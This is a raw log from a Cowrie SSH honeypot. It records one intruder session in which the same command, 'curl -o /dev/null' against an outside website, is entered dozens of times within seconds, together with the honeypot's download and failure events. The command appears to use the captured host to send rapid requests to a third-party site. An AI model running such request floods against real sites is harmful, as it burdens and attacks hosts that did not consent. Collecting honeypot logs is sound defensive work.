{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.150238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.186934Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.190925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.191861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.231177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.232291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.270902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.271914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","shasum":"145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.298207Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5 to var/lib/cowrie/downloads/145f14f8268cc94e90a31b788e1d0eefa917e33e057bcba2cfbb91ae393c61d5","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.319126Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.320576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.323957Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.376129Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.377200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.401250Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.415458Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.417119Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.455306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.456337Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.500430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.502068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.539932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.541308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.582968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.584021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.622244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.623493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.662088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.663195Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.700926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.702140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.742153Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.752995Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.754034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.783166Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.797668Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.798763Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.837913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.838943Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.848357Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.878307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.879435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.917720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.918886Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.958224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.959387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:03.997338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:03.998527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.037817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.038868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.082961Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.085668Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.123924Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.124895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.173995Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.175004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.213194Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.214447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.251964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.252952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.290256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.291395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.328696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.329612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.367570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.368551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.406028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.406903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.444256Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.447832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.448622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.457723Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.486611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.487559Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.521744Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.525201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.526249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.552220Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.560108Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.574172Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.575213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.612405Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.613423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.650940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.651788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.689218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.690200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.731539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.732922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.771600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.772580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.810650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.811651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.813542Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.848813Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.850508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.851314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.874823Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.888695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.889644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.926621Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.927640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:04.977842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:04.979202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.012311Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.021821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.023180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.061537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.062701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.100579Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.101482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.140497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.141415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.179474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.180469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.195757Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.219288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:05.220145Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:05.257671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
